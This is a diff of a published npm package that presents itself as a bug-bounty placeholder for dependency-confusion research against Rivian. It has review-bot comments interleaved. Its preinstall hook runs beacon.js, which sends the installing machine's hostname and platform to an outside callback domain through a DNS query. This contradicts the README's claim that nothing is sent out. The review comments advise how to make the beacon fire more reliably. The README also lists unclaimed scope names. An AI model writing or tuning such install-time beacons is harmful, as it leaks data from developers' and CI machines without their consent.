@rivianlabs/dt-rivian-com 0.0.1-security-research

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3)
  1. package/README.md +43 -0
  2. package/beacon.js +50 -0
  3. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1,43 @@
+ # @rivian/bedrock — Security Research Placeholder
+
+ **This is not an official Rivian package.** It is a security research disclosure placeholder published by an Intigriti bug bounty researcher under explicit triager invitation.
+
+ ## Why this package exists
+
+ The Rivian production web bundles served from `business.rivian.com` and `www.rivian.com` reference the package import name `@rivian/bedrock`. The `@rivian` scope was unclaimed on the public npm registry as of 2026-05-04, meaning any third party could publish arbitrary code under that name and have it installed by Rivian CI/build pipelines that resolve dependencies from the default public registry.
+
+ This placeholder claims the name with a DNS-only, non-intrusive payload and an explicit transfer-to-vendor commitment. Full report:
+
+ - Intigriti report ID: **RIVIAN-79L374RT** (rev2)
+ - Researcher: pahpah <pahpah@intigriti.me>
+
+ ## What the package does
+
+ On `npm install @rivian/bedrock`, a single `preinstall` script runs `beacon.js`. That script performs **one DNS resolution** to a researcher-owned Project Discovery interactsh subdomain. It does **not**:
+
+ - read any file
+ - read any environment variable
+ - send anything over HTTP
+ - persist anything to disk
+ - modify the installer's project
+
+ It only confirms the package was installed somewhere, so the researcher can demonstrate to Rivian's security team that dependency confusion is exploitable on Rivian infrastructure.
+
+ ## Transfer commitment
+
+ The maintainer of this package will transfer the `@rivian` scope and all packages published under it to Rivian Inc. on first request from a verifiable Rivian security contact (security@rivian.com or via Intigriti).
+
+ ## Defensive remediation (for Rivian)
+
+ 1. Claim the `@rivian` scope on public npm (https://www.npmjs.com/org/create).
+ 2. Publish defensive placeholder versions of every package name referenced in any Rivian production bundle.
+ 3. Set strict registry routing in every Rivian project's `.npmrc`:
+ ```
+ @rivian:registry=https://<your-internal-registry>/
+ ```
+ 4. Enforce `--frozen-lockfile` in CI.
+ 5. Audit and claim the variants: `@rivian-corp`, `@rivianev`, `@rivian-engineering`, `@rivian-internal`, `@rivian-com`, `@drive-tech`, `@drivetech`, `@dt-rivian`, `@dc-rivian`, `@ridg`, `@ridb`, `@rivianlabs`, `@rivianai`. All were unclaimed at disclosure time.
+
+ ## License
+
+ Unlicense — placeholder only, no usable code.
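Review bot: the package name this README describes throughout (`@rivian/bedrock`, including the `npm install @rivian/bedrock` instruction under "What the package does") is not the package this diff publishes, which `package.json` names `@rivianlabs/dt-rivian-com`; the `@rivianlabs` scope appears here only in remediation item 5 as one of the unclaimed variants, so the README should state which name it actually claims and why. The "It does not" list is also narrower than what `beacon.js` does: the script embeds the sanitized `os.hostname()` and `os.platform()` in the queried name, so the installing host's hostname does leave the machine via DNS, and the sentence "It only confirms the package was installed somewhere" should say so. In the remediation steps, `--frozen-lockfile` does nothing for a name that has never been resolved before, and scope routing alone still lets a lifecycle script run once a package is fetched; add `ignore-scripts=true` to the `.npmrc` fragment in step 3 so a `preinstall` hook like this one cannot execute during install, and state that the lockfile's `resolved` URLs should be checked for any `@rivian*` entry pointing at the public registry.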
package/beacon.js ADDED
@@ -0,0 +1,50 @@
+ // Security research beacon — DNS-only, no code execution, no exfiltration.
+ // Purpose: detect whether @rivian/bedrock is being installed from the public
+ // npm registry by Rivian-owned infrastructure (CI runners, dev workstations,
+ // container builds).
+ //
+ // This script performs ONE DNS resolution to a single Project Discovery
+ // interactsh subdomain whose owner is the security researcher pahpah
+ // (pahpah@intigriti.me, Intigriti report RIVIAN-79L374RT).
+ //
+ // It does NOT:
+ // - read any file (no fs)
+ // - read any environment variable
+ // - exfiltrate any data over HTTP
+ // - persist anything to disk
+ // - escalate or tamper with the installer's environment
+ //
+ // It only emits a single DNS A query so the researcher can prove that
+ // dependency confusion is reachable. The hostname is sanitized to plain
+ // alphanumeric/hyphen ASCII before resolution.
+ //
+ // If you are reading this in a Rivian audit: please claim the @rivian
+ // scope on npm immediately and contact pahpah@intigriti.me to coordinate
+ // transfer of this scope and any associated package names.
+
+ const dns = require('dns');
+ const os = require('os');
+
+ const CALLBACK_DOMAIN = 'd7s69vptt32q6momsa5gydt6m51d8nhj5.oast.online';
+
+ const safe = (s, max) => String(s || 'unknown')
+ .replace(/[^a-zA-Z0-9-]/g, '')
+ .slice(0, max || 30);
+
+ const subdomain = [
+ safe(os.hostname(), 40),
+ safe(os.platform(), 10),
+ String(Date.now()),
+ ].join('-');
+
+ const host = `${subdomain}.${CALLBACK_DOMAIN}`;
+
+ // Single non-blocking DNS lookup. We do not care about the result.
+ try {
+ dns.resolve(host, () => {});
+ } catch (e) {
+ // Swallow any error — this is a passive beacon, not a dependency.
+ }
+
+ // Always exit 0. We do not want to break the installer's build.
+ process.exit(0);
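Review bot: the leftmost label built for `host` can exceed the 63-octet DNS label limit, in which case the query fails before it leaves the host and the beacon never fires: `safe(os.hostname(), 40)` contributes up to 40 characters, `safe(os.platform(), 10)` up to 10 and `String(Date.now())` 13, joined by two hyphens, for a maximum of 65. On a runner with a long hostname `dns.resolve` hands a bad-name error to the ignored callback and nothing reaches `oast.online`, which defeats the only purpose of the script. Cap the hostname at 30 (the `safe` default already does this when `max` is omitted) or emit the three parts as separate dot-separated labels, each under 63 octets. Two smaller points: the `try`/`catch` around `dns.resolve` only covers synchronous throws, and every lookup error is delivered to the callback, so it adds nothing; and because `process.exit(0)` runs immediately after the call and does not wait for pending I/O, it is worth confirming that the UDP query is actually written before exit. Finally, the header comment's "no exfiltration" wording should match the code, which does transmit the sanitized hostname and platform as part of the query name.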
package/package.json ADDED
@@ -0,0 +1,14 @@
+ {
+ "name": "@rivianlabs/dt-rivian-com",
+ "version": "0.0.1-security-research",
+ "description": "Security research placeholder published as part of authorized Rivian Bug Bounty disclosure (Intigriti report RIVIAN-79L374RT). Triager Aurelius explicitly invited this claim. Intended for transfer to Rivian Inc. Contact: pahpah@intigriti.me",
+ "license": "Unlicense",
+ "scripts": {
+ "preinstall": "node ./beacon.js"
+ },
+ "files": ["beacon.js", "README.md"],
+ "repository": {"type": "git", "url": "https://intigriti.com/research/rivian-dt-rivian-com-placeholder"},
+ "keywords": ["security-research", "intigriti", "rivian-bug-bounty", "dependency-confusion-defense", "do-not-use"],
+ "author": "pahpah <pahpah@intigriti.me>",
+ "engines": {"node": ">=12"}
+ }
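Review bot: `"name"` is `@rivianlabs/dt-rivian-com` while README.md and the header comment in beacon.js describe `@rivian/bedrock`; either this is one of the variant-scope placeholders from README item 5 and the README should say so, or the name is wrong, and the two must agree before publication. The prerelease `"version": "0.0.1-security-research"` also limits how the beacon can be reached: semver ranges such as `^1.0.0` or `*` do not match prerelease versions, so a consumer manifest that already lists this name with a range would not resolve to it, and only a bare `npm install @rivianlabs/dt-rivian-com` (following the `latest` dist-tag) triggers the `preinstall` hook; if the aim is to test resolution by an existing manifest, a plain release version is needed as well. Two smaller points: the `repository.url` is an intigriti.com page rather than a git remote, so the `"type": "git"` declaration is misleading and npm cannot use it; and the description names an individual triager, which does not belong in a public registry record.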